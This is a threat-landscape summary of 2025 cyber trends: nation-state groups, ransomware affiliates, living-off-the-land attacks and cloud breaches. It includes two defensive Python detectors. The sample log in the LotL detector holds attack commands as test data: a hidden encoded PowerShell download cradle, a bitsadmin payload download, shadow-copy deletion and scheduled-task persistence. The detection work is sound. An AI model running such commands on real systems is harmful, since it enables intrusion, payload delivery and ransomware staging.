These threats and trends just may define your year
Analysis Summary
# Main Topic
This summary covers the four cybersecurity challenges that the Symantec and Carbon Black Threat Hunter Team expects to define the threat landscape for organizations in 2025: intensifying nation-state activity, Ransomware-as-a-Service, Living-off-the-Land attacks, and attacks on cloud environments.
## Key Points
- Nation-state actors are intensifying their activity, with conditions resembling the 2016 spike in Russian cyber aggression.
- The rise of Ransomware-as-a-Service (RaaS) continues to fuel scalable and competitive ransomware operations.
- Living-off-the-Land (LotL) attacks are increasing sharply; because they use tools already present on the host, they often slip past signature-based malware detection.
- Cloud environments are increasingly targeted: nation-state actors have demonstrated sophisticated breaches of major cloud platforms such as Microsoft 365.
## Threat Actors
- **Sandworm:** A Russian nation-state group known for destructive attacks, exemplified by past actions against Ukraine's power grid.
- **Dragonfly:** A Russian group capable of deep penetration into energy sector networks, utilizing spear phishing and custom Trojans.
- **Scattered Spider:** A prominent "super affiliate" in the RaaS ecosystem, known for social engineering help desk staff into resetting passwords and MFA; it has worked with RaaS operations including Noberus, RansomHub, and Qilin.
- **Fritillary (also known as Midnight Blizzard or APT29):** A Russian nation-state group innovating in cloud compromises, specifically targeting and breaching Microsoft 365 accounts, including those held by senior executives.
## TTPs
- **Russian Actors (General):** Escalating tactics, including physical sabotage (e.g., cutting undersea cables).
- **Dragonfly:** Utilizing spear phishing, custom Trojans, and achieving lateral movement across both administrative and Industrial Control System (ICS) networks.
- **Scattered Spider:** Social engineering help desk personnel into performing password changes and Multi-Factor Authentication (MFA) resets, which hands the attacker a valid account without defeating the MFA mechanism itself.
- **LotL Attacks:** Heavy reliance on legitimate, native operating system tools for infiltration and lateral movement, so no malicious binary needs to touch disk.
- LotL tools named in the report: PowerShell, PsExec, WMI, Schtasks, BITSAdmin, and Vssadmin.
- **Fritillary/APT29:** Demonstrating specific targeting of cloud environments, notably achieving breaches of Microsoft 365 accounts.
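The help-desk reset pattern attributed to Scattered Spider above leaves a trail in identity logs: a password reset performed by a help-desk account, a new MFA method registered shortly afterwards, then a sign-in from an address the account has never used. The Python below, an added example and not code from the Symantec/Carbon Black report, correlates those three events within a time window. The event records are constructed for illustration and their field names (`ts`, `user`, `action`, `actor`, `ip`, `detail`) are an assumed simplification of what an identity provider's audit and sign-in logs export, not any vendor's schema.

```python
"""Correlate help-desk password resets with MFA re-enrolment and new-IP sign-ins.

Added example, not code from the report. Events and field names are
constructed/assumed; map them onto your IdP's audit and sign-in log fields.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(hours=2)  # how long after the reset to look for follow-on activity

# Constructed events (not in chronological order on purpose; the detector sorts).
EVENTS = [
    {"ts": "2025-02-03T08:55:00Z", "user": "j.doe", "action": "signin", "actor": "j.doe", "ip": "203.0.113.10"},
    {"ts": "2025-02-03T13:00:00Z", "user": "j.doe", "action": "password_reset", "actor": "helpdesk-ops"},
    {"ts": "2025-02-03T13:04:00Z", "user": "j.doe", "action": "mfa_method_added", "actor": "j.doe", "detail": "Authenticator app"},
    {"ts": "2025-02-03T13:09:00Z", "user": "j.doe", "action": "signin", "actor": "j.doe", "ip": "198.51.100.77"},
    # Benign: help-desk reset, but MFA untouched and the next sign-in comes from a known IP.
    {"ts": "2025-02-03T09:00:00Z", "user": "a.lee", "action": "signin", "actor": "a.lee", "ip": "203.0.113.55"},
    {"ts": "2025-02-03T14:00:00Z", "user": "a.lee", "action": "password_reset", "actor": "helpdesk-ops"},
    {"ts": "2025-02-03T14:10:00Z", "user": "a.lee", "action": "signin", "actor": "a.lee", "ip": "203.0.113.55"},
    # Benign: self-service MFA enrolment with no reset around it.
    {"ts": "2025-02-03T15:00:00Z", "user": "m.kim", "action": "mfa_method_added", "actor": "m.kim", "detail": "FIDO2 key"},
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_helpdesk_takeover(events, window=WINDOW):
    """Return one alert per help-desk reset followed, within `window`, by both a
    new MFA method and a sign-in from an IP not seen for that user before the reset."""
    alerts = []
    by_user = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        by_user.setdefault(e["user"], []).append(e)

    for user, evs in by_user.items():
        seen_ips = set()  # IPs this user signed in from before the current point
        for i, e in enumerate(evs):
            if e["action"] == "signin":
                seen_ips.add(e["ip"])
            # Only resets performed by someone other than the user (help desk) matter here.
            if e["action"] != "password_reset" or e["actor"] == user:
                continue
            t0 = parse_ts(e["ts"])
            new_mfa = new_ip_signin = None
            for f in evs[i + 1:]:
                if parse_ts(f["ts"]) - t0 > window:
                    break
                if f["action"] == "mfa_method_added" and new_mfa is None:
                    new_mfa = f
                if f["action"] == "signin" and f["ip"] not in seen_ips and new_ip_signin is None:
                    new_ip_signin = f
            if new_mfa and new_ip_signin:
                alerts.append({
                    "user": user,
                    "reset_by": e["actor"],
                    "reset_at": e["ts"],
                    "mfa_added": new_mfa["detail"],
                    "new_ip": new_ip_signin["ip"],
                })
    return alerts


if __name__ == "__main__":
    for a in detect_helpdesk_takeover(EVENTS):
        print(f"ALERT {a['user']}: reset by {a['reset_by']} at {a['reset_at']}, "
              f"then MFA '{a['mfa_added']}' added and sign-in from {a['new_ip']}")
```

Only `j.doe` trips the rule; `a.lee` had a help-desk reset too, but kept the existing MFA method and signed in from a known address. Requiring all three events keeps the rule quiet on routine help-desk work while still catching the sequence the report describes.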
## Affected Systems
- **Energy Sector Networks:** Specifically targeted by Dragonfly, including Industrial Control System (ICS) networks.
- **Enterprise Systems:** Targeted by affiliates like Scattered Spider leading to credential compromise.
- **Cloud Services (Microsoft 365):** Targeted by Fritillary, including accounts belonging to senior executives.
- **Windows Endpoints and Servers:** Affected broadly, since LotL attacks abuse native tools (PowerShell, PsExec, WMI, Schtasks, BITSAdmin, Vssadmin) that are present on every host.
## Mitigations
- **For Russian Nation-State Threats:** Treat 2025 as a period of heightened nation-state risk comparable to 2016 and plan defenses accordingly.
- **For RaaS/Affiliates:** Expect affiliates to move between RaaS platforms quickly after law enforcement disrupts one, so defenses should target affiliate tradecraft (initial access, credential theft, lateral movement) rather than any single ransomware brand.
- **For LotL Attacks:** Build visibility into how legitimate, signed binaries such as PowerShell are invoked (parent process, command line, remote targets), since LotL intrusions often involve no malware for signature-based tools to catch.
- **For Cloud Threats:** Review cloud security posture rigorously rather than assuming cloud services are secure by default, and prioritize hardening Microsoft 365 identities and access against the nation-state methods now in use.
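The LotL tools listed under TTPs and the visibility point above come together in process-creation telemetry: the interesting signal is not the binary but its parent, its arguments and its target. The Python below is an added example, not code from the report. It runs simple rules over constructed process-creation records (the pipe-separated `timestamp|host|parent_image|image|command_line` layout is an assumption, not any vendor's schema) and decodes PowerShell's `-EncodedCommand` argument, which is base64 of UTF-16LE text, so the payload can be inspected rather than just flagged.

```python
"""Flag living-off-the-land (LotL) tool abuse in process-creation telemetry.

Added example; not code from the Symantec/Carbon Black report. The log lines
are constructed, and the pipe-separated layout is an assumption, not any
vendor's real event schema.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# Encoded PowerShell is base64 of UTF-16LE; build the sample payload in code so
# the decode below is exact rather than hand-typed.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_ENC = base64.b64encode(SAMPLE_CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (think Sysmon Event ID 1 / Windows 4688).
SAMPLE_LOG = (
    "2025-01-14T09:02:11Z|WS-041|explorer.exe|powershell.exe|powershell.exe -NoProfile -Command Get-Date\n"
    f"2025-01-14T09:03:40Z|WS-041|WINWORD.EXE|powershell.exe|powershell.exe -nop -w hidden -enc {SAMPLE_ENC}\n"
    "2025-01-14T09:05:02Z|SRV-DB1|cmd.exe|vssadmin.exe|vssadmin.exe delete shadows /all /quiet\n"
    "2025-01-14T09:05:30Z|SRV-DB1|services.exe|PSEXESVC.exe|PSEXESVC.exe\n"
    "2025-01-14T09:06:10Z|WS-041|cmd.exe|wmic.exe|wmic /node:SRV-FS2 process call create \"cmd /c whoami\"\n"
    "2025-01-14T09:07:00Z|WS-041|cmd.exe|schtasks.exe|schtasks /create /tn Updater /tr C:\\Users\\Public\\u.exe /sc minute /mo 5\n"
    "2025-01-14T09:08:45Z|WS-041|cmd.exe|bitsadmin.exe|bitsadmin /transfer job /download /priority high http://example.invalid/a.exe C:\\Users\\Public\\a.exe\n"
    "2025-01-14T09:10:00Z|SRV-DB1|services.exe|svchost.exe|svchost.exe -k netsvcs\n"
)


def parse(log_text):
    """Split the constructed pipe-separated records into dicts."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append({"ts": ts, "host": host, "parent": parent, "image": image, "cmdline": cmdline})
    return events


def decode_encoded_command(cmdline):
    """Decode PowerShell's -EncodedCommand (base64 of UTF-16LE); None if absent or invalid."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(log_text):
    """Return one finding per suspicious event; routine use of the same binaries passes."""
    findings = []
    for ev in parse(log_text):
        image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
        low = cmd.lower()
        technique, reasons = None, []
        if image == "powershell.exe":
            technique = "PowerShell"
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                reasons.append("encoded command: " + decoded[:60])
                if re.search(r"iex|invoke-expression|downloadstring|webclient", decoded, re.IGNORECASE):
                    reasons.append("download cradle in decoded payload")
            if re.search(r"-w(?:indowstyle)?\s+hidden", low):
                reasons.append("hidden window")
            if parent in OFFICE_PARENTS:
                reasons.append(f"spawned by Office process {ev['parent']}")
        elif image == "vssadmin.exe" and "delete" in low and "shadows" in low:
            technique, reasons = "Vssadmin", ["shadow copy deletion (ransomware precursor)"]
        elif image in {"psexec.exe", "psexec64.exe", "psexesvc.exe"}:
            technique, reasons = "PsExec", ["PsExec binary or its PSEXESVC service on the target host"]
        elif image == "wmic.exe" and "process call create" in low:
            node = re.search(r"/node:(\S+)", low)
            technique = "WMI"
            reasons = ["remote process creation" + (f" on {node.group(1)}" if node else "")]
        elif image == "schtasks.exe" and "/create" in low:
            technique, reasons = "Schtasks", ["scheduled task creation"]
            if any(p in low for p in USER_WRITABLE):
                reasons.append("task runs a binary from a user-writable path")
        elif image == "bitsadmin.exe" and ("/transfer" in low or "/addfile" in low):
            technique, reasons = "BITSAdmin", ["BITS job used to download a file"]
        if reasons:
            findings.append({"ts": ev["ts"], "host": ev["host"], "technique": technique,
                             "image": ev["image"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['host']:8} {f['technique']:10} {'; '.join(f['reasons'])}")
```

A plain `Get-Date` run from Explorer passes, while the same `powershell.exe` launched hidden from Word with an encoded download cradle is flagged on three counts; `svchost.exe` is never touched. The rules are deliberately narrow so the logic is readable; in production the parent and path allow-lists need tuning to the environment, and the same checks belong in the EDR or SIEM query language rather than a standalone script.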
## Conclusion
The 2025 threat environment will be defined by escalating state-sponsored aggression, social engineering and credential theft underpinning RaaS, growing reliance on hard-to-detect LotL techniques, and a shift toward breaching cloud infrastructure that was assumed to be well secured. Proactive defense means moving detection beyond malware signatures to the misuse of legitimate tools, and strengthening identity and access controls for cloud services.